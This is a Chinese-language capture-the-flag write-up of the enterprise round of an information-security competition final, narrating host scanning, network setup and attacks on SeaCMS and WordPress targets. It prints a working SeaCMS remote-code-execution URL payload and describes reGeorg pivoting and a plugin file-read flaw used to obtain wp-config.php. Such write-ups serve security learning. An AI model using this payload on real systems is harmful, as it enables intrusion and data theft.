[信息安全铁人三项赛总决赛总结](企业赛)

---

WriteUps

信息安全铁人三项赛总决赛总结(企业赛)
信息安全铁人三项赛总决赛(数据赛)第二题
信息安全铁人三项赛总决赛(数据赛)第三题
信息安全铁人三项赛总决赛(数据赛)第四题

---

火车上仓促中写的比较乱...
数据赛的题目好多都不记得了 , 很多题目都是脑补出来的...就当练习了...

数据赛题目请见 :
https://github.com/WangYihang/t3sec-traffic

---

0x00 . 接入网络环境

每个队伍提供两个
网关为 192.168.22.1
每个队伍之间的环境互相隔离
每个队伍的靶机为 202.1.1.0/24 段
需要自行扫描存活主机
通过网线接入比赛环境网络以后就无法上外网了

比赛是在武汉党校进行的
比赛会场存在党校自己的 WIFI
可以直接接入上网

为了方便进行内网渗透测试以及 Flag 提交

采用了配置静态路由的方式达到既能接入内网 , 又可以接入互联网的效果

具体步骤为 :

1. 通过网线接入交换机
2. 通过DHCP服务获取网关地址(192.168.22.1)
3. 配置路由使 202.1.1.0/24 的数据包被路由至 192.168.22.1
4. 确保内网比赛平台可以访问后 , 打开WIFI , 接入比赛会场WIFI
5. 配置静态路由 , 添加一条默认路由 , 让不属于内网以及202.1.1.//24段的数据包都被路由至WIFI的网关

---

0x01 . 企业赛

比赛开始 , 首先用 nmap 扫描了一下 202.1.1.0/24 这个网段的存货主机
发现了
202.1.1.31:80
202.1.1.33:80

其中
31 是海洋CMS
33 是WordPress

这种情况只能是上网找现成的 Payload 了

搜索 : seacms 漏洞
发现今年爆出的一个很严重的远程代码执行漏洞

http://202.1.1.31/search.php?searchtype=5&tid=&area=eval($_GET[1])&1=system(%27cat flag.txt%27);

直接利用拿到 flag11
搜集一波信息 :
ifconfig :

eth3      Link encap:Ethernet  HWaddr FA:16:3E:AC:15:B3  
         inet addr:10.0.0.3  Bcast:10.0.0.255  Mask:255.255.255.0
         inet6 addr: fe80::f816:3eff:feac:15b3/64 Scope:Link
         UP BROADCAST RUNNING MULTICAST  MTU:1450  Metric:1
         RX packets:1968 errors:0 dropped:0 overruns:0 frame:0
         TX packets:1427 errors:0 dropped:0 overruns:0 carrier:0
         collisions:0 txqueuelen:1000
         RX bytes:211498 (206.5 KiB)  TX bytes:2207575 (2.1 MiB)

lo        Link encap:Local Loopback  
         inet addr:127.0.0.1  Mask:255.0.0.0
         inet6 addr: ::1/128 Scope:Host
         UP LOOPBACK RUNNING  MTU:16436  Metric:1
         RX packets:1176 errors:0 dropped:0 overruns:0 frame:0
         TX packets:1176 errors:0 dropped:0 overruns:0 carrier:0
         collisions:0 txqueuelen:0
         RX bytes:177002 (172.8 KiB)  TX bytes:177002 (172.8 KiB)

arp -a :

...
忘了保存

route -n :

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
169.254.169.254 10.0.0.2        255.255.255.255 UGH   0      0        0 eth3
10.0.0.0        0.0.0.0         255.255.255.0   U     1      0        0 eth3
0.0.0.0         10.0.0.1        0.0.0.0         UG    0      0        0 eth3

然后利用 reGeorg 进入内网继续进行探测

扫描到内网开放主机如下 :

10.0.0.1
10.0.0.2:80

继续往下就做不下去了...
找到了类似的这个 :

http://docs.amazonaws.cn/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-retrieval

然后怼了好久 , 没思路

再看看 WordPress 吧

由于之前准备的问题 , 物理机为 Ububtu
并没有安装 WP-Scan
所以直接开了一台 Kali 虚拟机
直接桥接到物理网络
发现还需要和物理机那样配置一遍静态路由
好麻烦...
最后才发现 , 直接将虚拟机配置成 NAT 就可以了
既能上外网 , 又能上内网

根据 WordPress 上面的文章留言的提示

使用 WP-Scan 扫描了一下插件
发现存在插件 :

WP Hide & Security Enhancer — WordPress Plugins

然后搜索这个插件的现有漏洞
果真搜索到了一个任意文件读取漏洞

https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/

通过这个漏洞读取 :
wp-login.php
wp-config.php

image.png

image.png

拿到了 flag3 和 flag4
然后继续进行探测

当时的思路是 , 有可能登录的逻辑被修改了 , 可能存在可以绕过的情况
但是发现并不行
还有一个思路是 , 感觉有可能被人中了小马
找到这个小马就可以直接连了
最后这个思路也没有结果...
企业赛就做到这里了...

懵逼了一上午 , 下午看看数据赛吧...